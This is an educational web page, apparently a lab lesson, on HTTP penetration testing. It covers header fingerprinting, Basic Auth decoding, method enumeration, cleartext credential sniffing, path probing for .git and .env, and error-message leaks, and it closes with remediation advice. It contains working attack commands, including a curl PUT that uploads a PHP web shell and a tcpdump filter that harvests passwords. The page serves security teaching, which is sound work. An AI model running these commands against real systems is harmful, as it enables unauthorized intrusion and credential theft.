Learn how attackers enumerate web servers, identify misconfigurations, and intercept credentials transmitted over unencrypted HTTP — and why HTTPS alone is not enough.
HTTP Penetration Testing
HTTP (Hypertext Transfer Protocol) is the foundation of data communication on the web. Unlike its successor HTTPS, plain HTTP transmits all data — including usernames and passwords — in cleartext. Anyone with network access between the client and server can read every byte.
Web server penetration testing involves probing HTTP methods, headers, responses, and error messages to identify misconfigurations, exposed admin interfaces, and information leakage that can be used to gain access or escalate an attack.
HTTP as an Attack Surface — What the Protocol Reveals by Design
HTTP was designed for transparency and simplicity, not security. Every request and response in the protocol carries metadata about the server, the application, the user's session, and the technology stack — all of which are useful to an attacker in the reconnaissance phase. Understanding exactly what HTTP reveals, and why, is the foundation of web server penetration testing.
The glass storefront analogy: HTTP is like running a business from a glass-walled building with the filing cabinets, staff computers, and back-office systems visible from the street. HTTPS puts frosted glass on the windows — no one can read the content of transactions — but the building's layout, which rooms exist, how many staff are inside, and what systems are running are still observable from outside. HTTP has clear glass. An attacker walking past can read everything on every desk.
HTTP penetration testing exploits three categories of information that the protocol exposes regardless of whether credentials are involved:
- Server identification — The
ServerandX-Powered-Byheaders announce the web server software, version, and application framework. This information directly maps to known CVEs. An attacker who knows a server runs Apache 2.4.29 can immediately look up unpatched vulnerabilities for that exact version. - Structural information — HTTP response codes (200, 301, 403, 404, 500) reveal which paths exist on the server, which are forbidden but present, and which generate application errors that may leak stack traces or database details.
- Behavioural information — How a server responds to unusual methods (PUT, DELETE, TRACE), unusual headers, and malformed requests reveals misconfiguration, enabled capabilities, and trust relationships that can be exploited.
The HTTP Request-Response Model — What Every Exchange Contains
Every HTTP interaction follows a request-response pattern. Both sides contain fields that are attack surface when operating over plaintext or when misconfigured:
Method GET /admin/dashboard HTTP/1.1 ← method reveals what operations exist Host intranet.corp.com ← virtual host — may reveal internal naming Auth Authorization: Basic YWRtaW46cGFzcw== ← Base64 creds, not encrypted Cookie session=abc123; role=admin ← client-controlled session state UA Mozilla/5.0 (Windows NT 10.0) ← client fingerprinting Response headers Server: Apache/2.4.29 (Ubuntu) ← exact version → CVE lookup X-Powered-By: PHP/7.2.24 ← language + version X-AspNet-Version: 4.0.30319 ← .NET version Set-Cookie: session=abc; HttpOnly; Secure missing ← cookie sent over HTTP Access-Control-Allow-Origin: * ← CORS misconfiguration
What HTTP Exposes
HTTP requests and responses contain a wealth of information attackers use for both passive reconnaissance and active exploitation. Server headers reveal software versions, response codes reveal which paths exist, error messages leak stack traces and database details, and HTTP methods like PUT or DELETE may be enabled when they absolutely should not be.
curl -I http://target.com HTTP/1.1 200 OK Server: Apache/2.4.29 (Ubuntu) <-- version fingerprint → CVE search X-Powered-By: PHP/7.2.24 <-- EOL PHP, known vulns X-Content-Type-Options: (missing) <-- missing security header X-Frame-Options: (missing) <-- clickjacking possible Strict-Transport-Security: (missing) <-- HSTS not enforced
Each piece of information above is a direct input to the next phase of an assessment. An Apache 2.4.29 version string maps directly to CVE-2021-41773 and related vulnerabilities. PHP 7.2 reached end-of-life in November 2020 — no security patches since then. Missing security headers indicate a server that has never been hardened to baseline standards. Together, a single curl -I command provides a full initial risk profile of the target.
Common HTTP Attack Vectors
HTTP Basic Authentication sends credentials with every single request — not just the login. The credentials are encoded in Base64, which any tool or person can reverse instantly. Over plain HTTP, anyone on the network path can capture and decode them with a single command. Even over HTTPS, Basic Auth credentials captured via ARP spoofing before the TLS handshake, or from a misconfigured proxy, are immediately readable.
The name badge analogy: HTTP Basic Auth is like requiring employees to wear name badges that include their password written on the back. The badge faces forward (the Base64 encoding looks scrambled), but anyone who asks you to turn around can read it instantly. The encoding provides the visual appearance of security with none of the actual protection.
# Request captured on the wire or via Burp proxy: GET /admin HTTP/1.1 Host: target.com Authorization: Basic YWRtaW46cGFzc3dvcmQxMjM= # Decode in one command — no key, no tool, instant: echo "YWRtaW46cGFzc3dvcmQxMjM=" | base64 -d admin:password123 # Basic Auth sends this header on EVERY request to the protected path # Browser caches the credentials and re-sends for the entire session # One packet capture = permanent credential access
HTTP defines a set of methods (verbs) for different operations: GET retrieves resources, POST submits data, PUT uploads or replaces files, DELETE removes resources, TRACE echoes the request back (useful for cross-site tracing attacks), and OPTIONS reports which methods are enabled. Most web applications only need GET and POST. Finding PUT or DELETE enabled is a critical misconfiguration — on a web server it typically means an attacker can write arbitrary files to the server.
# Enumerate allowed methods with OPTIONS: curl -X OPTIONS http://target.com -i HTTP/1.1 200 OK Allow: GET, POST, OPTIONS, PUT, DELETE, TRACE # PUT enabled — attempt to upload a file: curl -X PUT http://target.com/shell.php -d '<?php system($_GET["cmd"]); ?>' HTTP/1.1 201 Created # Web shell uploaded — execute OS commands via browser # TRACE enabled — test for Cross-Site Tracing (XST): curl -X TRACE http://target.com -H "Cookie: session=abc123" TRACE / HTTP/1.1 Cookie: session=abc123 <-- server reflects cookies back # XST can bypass HttpOnly via JavaScript XMLHttpRequest TRACE
When an application uses an HTTP (not HTTPS) login form, the username and password are transmitted in the POST body with zero obfuscation. Any network observer — a compromised switch, a rogue Wi-Fi access point, a malicious ISP, or an attacker performing ARP spoofing on the same LAN — can capture and read them. This is not a vulnerability in the application code; it is an infrastructure-level failure to use transport encryption.
This scenario is particularly common on corporate intranets and internal management systems where developers assume "it's internal, so it's safe." Internal network sniffing following initial compromise is a standard step in lateral movement — and internal HTTP services are a primary target.
# What appears on the wire — readable by anyone on the network path: POST /login HTTP/1.1 Host: intranet.corp.com Content-Type: application/x-www-form-urlencoded username=admin&password=hunter2&remember_me=true # tcpdump or Wireshark captures this verbatim # No decryption, no key material, no computational effort required # Capturing on a shared network segment (attacker has LAN access): tcpdump -i eth0 -A 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep -E 'username|password' username=admin&password=hunter2
HTTP response codes are a roadmap of the server's content. A 200 means the path exists and is accessible. A 403 (Forbidden) is especially valuable — it means the path exists but access is restricted, confirming a resource worth targeting. A 301/302 redirect reveals the actual location of moved resources. By systematically probing paths and interpreting the response codes, an attacker maps the server's complete structure without needing any credentials.
for path in admin backup config .git phpmyadmin api .env wp-admin; do curl -s -o /dev/null -w "%{http_code} /$path\n" http://target.com/$path done 200 /admin <-- admin panel accessible without auth 403 /backup <-- exists but forbidden — try direct file access 200 /config <-- configuration directory accessible 200 /.git <-- source code repository exposed! 404 /phpmyadmin 200 /api 200 /.env <-- environment variables file — credentials! # .git exposed = reconstruct full source code with git-dumper # .env exposed = database passwords, API keys, secret keys
The /.git exposure deserves special attention. When a developer deploys code by copying the entire project directory to the web root (rather than using a proper deployment pipeline), the hidden .git folder is often included. Tools like git-dumper can reconstruct the entire source code repository from a publicly accessible /.git endpoint — including full commit history, deleted files, and any credentials that were ever committed.
HTTP error responses — particularly 500 Internal Server Error and application-generated error pages — frequently leak information that developers intended only for debugging: stack traces, database query strings, file system paths, framework versions, and internal hostnames. An attacker who can trigger errors reliably can extract a complete map of the application's internals.
# Trigger a SQL error by injecting a single quote: curl "http://target.com/product?id=1'" HTTP/1.1 500 Internal Server Error Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result File: /var/www/html/product.php line 47 Query: SELECT * FROM products WHERE id='1'' AND active=1 Database: shop_db Host: db01.internal.corp.com # Leaked: file path, query structure, DB name, internal hostname # Trigger a framework error with a long path: curl "http://target.com/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" Laravel v8.75.0 — NotFoundHttpException #0 /var/www/html/vendor/laravel/framework/src/Illuminate/... # Leaked: framework name, version, exact file system paths
Security headers are server-side controls that instruct browsers on how to handle content. Their absence doesn't directly enable attacks — but it removes defences that would otherwise mitigate entire vulnerability classes. An HTTP security header audit is part of every web server assessment and maps directly to compliance requirements (OWASP ASVS, PCI DSS).
# Comprehensive header check with nikto or manually: curl -I https://target.com | grep -E "Strict|Content-Security|X-Frame|X-Content|Referrer|Permissions" Strict-Transport-Security: max-age=31536000 ✓ HSTS present Content-Security-Policy: (missing) ✗ XSS amplification possible X-Frame-Options: (missing) ✗ Clickjacking possible X-Content-Type-Options: nosniff ✓ MIME sniffing blocked Referrer-Policy: (missing) ✗ Referrer leaks to third parties Permissions-Policy: (missing) ✗ Browser features unrestricted # Missing CSP = no restriction on where scripts can load from # Missing X-Frame-Options = can embed in iframe for clickjacking # Each missing header is a separate finding with its own remediation
HTTP Misconfiguration in Production Environments
A company's HR department uses an internal web application — hosted on the corporate intranet, accessible only to employees — for submitting time-off requests, viewing payslips, and updating personal information. The application runs on HTTP because "it's internal, so it doesn't need HTTPS." The login form transmits credentials in POST body plaintext.
An attacker who compromises any workstation on the corporate network — via phishing, a USB drop, or a compromised contractor laptop — can run passive tcpdump on the network interface. Over the course of a normal workday, dozens of employees log into the HR portal. The attacker captures every username and password. Many employees reuse their HR portal password for their Windows domain account. The attacker now has Active Directory credentials for a significant portion of the workforce from a single passive capture.
This is not a theoretical risk — it is the standard post-exploitation reconnaissance pattern used in real intrusions. "Internal" does not mean "trusted network." Any endpoint on the corporate LAN is a potential capture point.
A development team deploys their web application to a Linux server by running git clone directly into /var/www/html/. The nginx configuration serves all files in that directory. The .git folder — which contains the entire version control history — is therefore served publicly.
A penetration tester probing the server with a basic response code scan finds /.git returns 200. Running git-dumper against the endpoint reconstructs the complete repository. The commit history reveals a commit three months ago titled "remove hardcoded creds" — which contains the AWS access key and secret that were previously baked into the deployment configuration. The key was removed from code but was never rotated in AWS. The key is still valid. The tester now has AWS IAM access to the organisation's cloud infrastructure.
A legacy intranet file-sharing application uses WebDAV (Web Distributed Authoring and Versioning), which extends HTTP with methods like PUT, MKCOL, and PROPFIND for file management. The server was configured in 2012 with HTTP PUT enabled globally rather than scoped to specific authenticated WebDAV paths. An OPTIONS request to the root confirms PUT is available without authentication.
A tester uploads a PHP web shell to the document root using a single curl command. The shell is immediately accessible and executes OS commands as the www-data user. From there, post-exploitation tools are uploaded, local privilege escalation is attempted, and the internal network is pivoted into from the now-compromised server. The entire chain started with one misconfigured HTTP method check.
What HTTP Misconfigurations Mean for Infrastructure
- Version disclosure accelerates targeted exploitation. A server that announces
Apache/2.4.29in every response has done half the attacker's research for them. Version-specific CVEs are publicly catalogued. Suppressing or falsifying version headers withServerTokens Prod(Apache) orserver_tokens off(nginx) is a trivial configuration change that removes this assistance. - Plain HTTP on internal networks is a credential harvesting opportunity. Every internal service running HTTP that requires authentication is a passive capture opportunity for any attacker who has already gained a foothold on the network. A single compromised endpoint with tcpdump access can harvest credentials from dozens of internal services over hours or days.
- Dangerous HTTP methods are rarely needed and often overlooked. TRACE, PUT, and DELETE have legitimate uses — WebDAV, REST APIs with proper authentication — but they are frequently enabled globally by default or by misunderstanding. An OPTIONS check against every web server in scope should be part of any infrastructure assessment.
- Missing security headers are a compliance failure with direct remediation paths. OWASP ASVS Level 1 requires specific security headers. PCI DSS 6.4 requires web application protection. Headers like CSP, HSTS, and X-Frame-Options have zero performance impact and two-minute configuration changes. An assessment finding missing headers with no remediation is an indication the server has never been hardened to any baseline standard.
- Error messages are a free intelligence briefing for attackers. Verbose error pages in production are a developer convenience that became a security liability. Stack traces, SQL queries, file system paths, and framework versions should never reach the client in production. Custom error pages that return a generic message while logging the detail server-side is the standard remediation.
What You Need to Know
You've covered the theory. Now apply it hands-on in the simulated environment.
Start Lab — HTTP Pentest →← Return to all labs